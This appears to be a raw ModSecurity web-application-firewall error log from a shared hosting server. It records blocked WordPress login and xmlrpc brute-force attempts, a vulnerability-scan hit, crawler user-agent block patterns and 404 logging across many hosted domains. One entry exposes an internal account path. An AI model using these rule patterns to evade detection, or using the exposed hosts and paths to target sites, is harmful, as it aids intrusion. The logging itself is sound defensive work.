[Tue May 26 18:10:51.584770 2026] [security2:error] [pid 973439:tid 973623] [client 74.7.230.59:39296] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWU0wBg9mKRpdEFs3BnSwAANkA"], referer: https://www.taotechservices.com/robots.txt
[Tue May 26 18:10:52.262921 2026] [security2:error] [pid 973439:tid 973617] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU0wBg9mKRpdEFs3BnWgAAADA"]
[Tue May 26 18:10:53.504283 2026] [security2:error] [pid 973439:tid 973615] [client 82.76.238.33:63115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU1QBg9mKRpdEFs3BnfgAAAC4"]
[Tue May 26 18:10:53.504910 2026] [security2:error] [pid 973439:tid 973615] [client 82.76.238.33:63115] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU1QBg9mKRpdEFs3BnfgAAAC4"]
[Tue May 26 18:10:55.562941 2026] [security2:error] [pid 973439:tid 973694] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU1gBg9mKRpdEFs3BnogAAAH0"]
[Tue May 26 18:10:57.324248 2026] [security2:error] [pid 973439:tid 973625] [client 45.132.115.123:21605] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWU2ABg9mKRpdEFs3BnygAAADg"]
[Tue May 26 18:10:57.731853 2026] [security2:error] [pid 973439:tid 973624] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU2QBg9mKRpdEFs3Bn1gAAADc"]
[Tue May 26 18:11:00.622964 2026] [security2:error] [pid 973439:tid 973608] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU3ABg9mKRpdEFs3BoEQAAACc"]
[Tue May 26 18:11:02.546271 2026] [security2:error] [pid 973439:tid 973609] [client 113.172.38.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU3QBg9mKRpdEFs3BoNgAAACg"]
[Tue May 26 18:11:03.488206 2026] [security2:error] [pid 973439:tid 973591] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU3gBg9mKRpdEFs3BoUQAAABY"]
[Tue May 26 18:11:04.728182 2026] [security2:error] [pid 973439:tid 973573] [client 82.76.238.33:63560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU4ABg9mKRpdEFs3BoeQAAAAQ"]
[Tue May 26 18:11:04.728299 2026] [security2:error] [pid 973439:tid 973573] [client 82.76.238.33:63560] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU4ABg9mKRpdEFs3BoeQAAAAQ"]
[Tue May 26 18:11:05.671728 2026] [security2:error] [pid 973439:tid 973640] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU4QBg9mKRpdEFs3BohQAAAEc"]
[Tue May 26 18:11:06.624481 2026] [security2:error] [pid 973439:tid 973547] [remote 123.30.233.12:53238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWU4gBg9mKRpdEFs3BorQAAeGs"]
[Tue May 26 18:11:07.176496 2026] [security2:error] [pid 973439:tid 973548] [remote 123.30.233.12:53238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWU4wBg9mKRpdEFs3BovgAANWw"], referer: https://kingsclubmembership.com/wp-login.php
[Tue May 26 18:11:07.303743 2026] [security2:error] [pid 973439:tid 973552] [remote 91.227.122.219:58214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWU4wBg9mKRpdEFs3BovwAANHA"]
[Tue May 26 18:11:08.869601 2026] [security2:error] [pid 973439:tid 973647] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU4wBg9mKRpdEFs3Bo1QAAAE4"]
[Tue May 26 18:11:11.020494 2026] [security2:error] [pid 973439:tid 973614] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU5gBg9mKRpdEFs3BpFwAAAC0"]
[Tue May 26 18:11:11.485119 2026] [security2:error] [pid 973439:tid 973451] [remote 72.167.150.128:60374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWU5wBg9mKRpdEFs3BpKAAAZAs"]
[Tue May 26 18:11:11.771052 2026] [security2:error] [pid 973439:tid 973453] [remote 72.167.150.128:60374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWU5wBg9mKRpdEFs3BpNAAADw0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:11:13.480848 2026] [security2:error] [pid 973439:tid 973611] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU6QBg9mKRpdEFs3BpagAAACo"]
[Tue May 26 18:11:14.806660 2026] [security2:error] [pid 973439:tid 973604] [client 66.132.172.210:5164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWU6gBg9mKRpdEFs3BpowAAACM"]
[Tue May 26 18:11:15.047790 2026] [security2:error] [pid 973439:tid 973594] [client 207.46.13.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWU6gBg9mKRpdEFs3BpqAAAABk"]
[Tue May 26 18:11:15.900178 2026] [security2:error] [pid 973439:tid 973606] [client 82.76.238.33:64006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU6wBg9mKRpdEFs3BpxAAAACU"]
[Tue May 26 18:11:15.900340 2026] [security2:error] [pid 973439:tid 973606] [client 82.76.238.33:64006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU6wBg9mKRpdEFs3BpxAAAACU"]
[Tue May 26 18:11:16.688768 2026] [security2:error] [pid 973439:tid 973669] [client 207.46.13.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWU7ABg9mKRpdEFs3Bp1wAAAGQ"]
[Tue May 26 18:11:16.827944 2026] [security2:error] [pid 973439:tid 973651] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU6wBg9mKRpdEFs3BpvwAAAFI"]
[Tue May 26 18:11:18.758065 2026] [security2:error] [pid 973439:tid 973693] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU7gBg9mKRpdEFs3BqAwAAAHw"]
[Tue May 26 18:11:21.303847 2026] [security2:error] [pid 973439:tid 973604] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU8ABg9mKRpdEFs3BqSAAAACM"]
[Tue May 26 18:11:22.252786 2026] [security2:error] [pid 973439:tid 973507] [remote 111.229.10.83:52464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWU8gBg9mKRpdEFs3BqZgAAT0M"]
[Tue May 26 18:11:23.167347 2026] [security2:error] [pid 973439:tid 973606] [client 114.119.140.239:47931] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/regalia"] [unique_id "ahWU8wBg9mKRpdEFs3BqgwAAACU"], referer: https://www.athelstan.org.in/regalia?lightbox=dataItem-k8kc7r9o
[Tue May 26 18:11:23.869211 2026] [security2:error] [pid 973439:tid 973629] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU8wBg9mKRpdEFs3BqjAAAADw"]
[Tue May 26 18:11:23.995756 2026] [security2:error] [pid 973439:tid 973574] [client 185.204.170.94:51674] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "image/tiff"] [severity "WARNING"] [hostname "www.wrapmachines.com"] [uri "/"] [unique_id "ahWU8wBg9mKRpdEFs3BqowAAAAU"]
[Tue May 26 18:11:25.023578 2026] [security2:error] [pid 973439:tid 973528] [remote 45.79.189.31:18832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWU9ABg9mKRpdEFs3BqvAAAQFg"]
[Tue May 26 18:11:26.364320 2026] [security2:error] [pid 973439:tid 973574] [client 185.204.170.94:51674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.wrapmachines.com"] [uri "/"] [unique_id "ahWU8wBg9mKRpdEFs3BqowAAAAU"]
[Tue May 26 18:11:26.881607 2026] [security2:error] [pid 973439:tid 973595] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU9QBg9mKRpdEFs3Bq6AAAABo"]
[Tue May 26 18:11:26.966894 2026] [security2:error] [pid 973439:tid 973606] [client 82.76.238.33:64441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU9gBg9mKRpdEFs3Bq-wAAACU"]
[Tue May 26 18:11:26.967085 2026] [security2:error] [pid 973439:tid 973606] [client 82.76.238.33:64441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWU9gBg9mKRpdEFs3Bq-wAAACU"]
[Tue May 26 18:11:27.427409 2026] [security2:error] [pid 973439:tid 973532] [remote 64.31.25.250:47864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWU9wBg9mKRpdEFs3Bq_AAARlw"]
[Tue May 26 18:11:27.455539 2026] [security2:error] [pid 973439:tid 973538] [remote 74.7.241.58:41878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWU9wBg9mKRpdEFs3BrCwAAQWI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:11:29.190431 2026] [security2:error] [pid 973439:tid 973691] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU-ABg9mKRpdEFs3BrGgAAAHo"]
[Tue May 26 18:11:29.241660 2026] [security2:error] [pid 973439:tid 973629] [client 170.247.12.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWU-QBg9mKRpdEFs3BrKQAAADw"]
[Tue May 26 18:11:30.443043 2026] [security2:error] [pid 973439:tid 973510] [remote 47.128.25.89:22042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/category/sin-categoria/"] [unique_id "ahWU-gBg9mKRpdEFs3BrSQAAJEY"]
[Tue May 26 18:11:31.853685 2026] [security2:error] [pid 973439:tid 973580] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU-wBg9mKRpdEFs3BrWwAAAAs"]
[Tue May 26 18:11:32.239611 2026] [security2:error] [pid 973439:tid 973627] [client 202.76.139.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU-wBg9mKRpdEFs3BrZAAAADo"]
[Tue May 26 18:11:34.311366 2026] [security2:error] [pid 973439:tid 973652] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU_QBg9mKRpdEFs3BrjwAAAFM"]
[Tue May 26 18:11:37.003520 2026] [security2:error] [pid 973439:tid 973677] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVAABg9mKRpdEFs3BrygAAAGw"]
[Tue May 26 18:11:37.434887 2026] [security2:error] [pid 973439:tid 973574] [client 74.7.230.48:54202] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWVAQBg9mKRpdEFs3Br2wAABW8"]
[Tue May 26 18:11:37.611556 2026] [security2:error] [pid 973439:tid 973616] [client 74.7.228.5:38532] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWVAQBg9mKRpdEFs3Br3wAAL3A"]
[Tue May 26 18:11:38.135036 2026] [security2:error] [pid 973439:tid 973492] [remote 64.31.25.250:52654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWVAgBg9mKRpdEFs3Br8wAATTQ"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:11:38.992580 2026] [security2:error] [pid 973439:tid 973595] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVAgBg9mKRpdEFs3Br_AAAABo"]
[Tue May 26 18:11:42.395221 2026] [security2:error] [pid 973439:tid 973571] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVBQBg9mKRpdEFs3BsVQAAAAI"]
[Tue May 26 18:11:43.825136 2026] [security2:error] [pid 973439:tid 973657] [client 34.147.28.155:40960] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "webdisk.rabbanitradingcompany.com"] [uri "/"] [unique_id "ahWVBwBg9mKRpdEFs3BshgAAAFg"]
[Tue May 26 18:11:43.825229 2026] [security2:error] [pid 973439:tid 973657] [client 34.147.28.155:40960] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "webdisk.rabbanitradingcompany.com"] [uri "/"] [unique_id "ahWVBwBg9mKRpdEFs3BshgAAAFg"]
[Tue May 26 18:11:45.289679 2026] [security2:error] [pid 973439:tid 973651] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVCABg9mKRpdEFs3BsogAAAFI"]
[Tue May 26 18:11:46.175059 2026] [security2:error] [pid 973439:tid 973665] [client 114.119.150.22:61667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.shirdisaibabatemple.org"] [uri "/saitemple-history.php"] [unique_id "ahWVCgBg9mKRpdEFs3BsygAAAGA"], referer: https://www.shirdisaibabatemple.org/
[Tue May 26 18:11:48.131063 2026] [security2:error] [pid 973439:tid 973569] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVCwBg9mKRpdEFs3Bs4wAAAAA"]
[Tue May 26 18:11:49.498649 2026] [security2:error] [pid 973439:tid 973640] [client 82.76.238.33:64910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVDQBg9mKRpdEFs3BtDQAAAEc"]
[Tue May 26 18:11:49.498809 2026] [security2:error] [pid 973439:tid 973640] [client 82.76.238.33:64910] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVDQBg9mKRpdEFs3BtDQAAAEc"]
[Tue May 26 18:11:50.373463 2026] [security2:error] [pid 973439:tid 973607] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVDQBg9mKRpdEFs3BtEAAAACY"]
[Tue May 26 18:11:50.854213 2026] [security2:error] [pid 973439:tid 973691] [client 85.208.96.204:24506] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWVDgBg9mKRpdEFs3BtOwAAAHo"]
[Tue May 26 18:11:50.854330 2026] [security2:error] [pid 973439:tid 973691] [client 85.208.96.204:24506] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWVDgBg9mKRpdEFs3BtOwAAAHo"]
[Tue May 26 18:11:52.256359 2026] [security2:error] [pid 973439:tid 973674] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVDwBg9mKRpdEFs3BtSQAAAGk"]
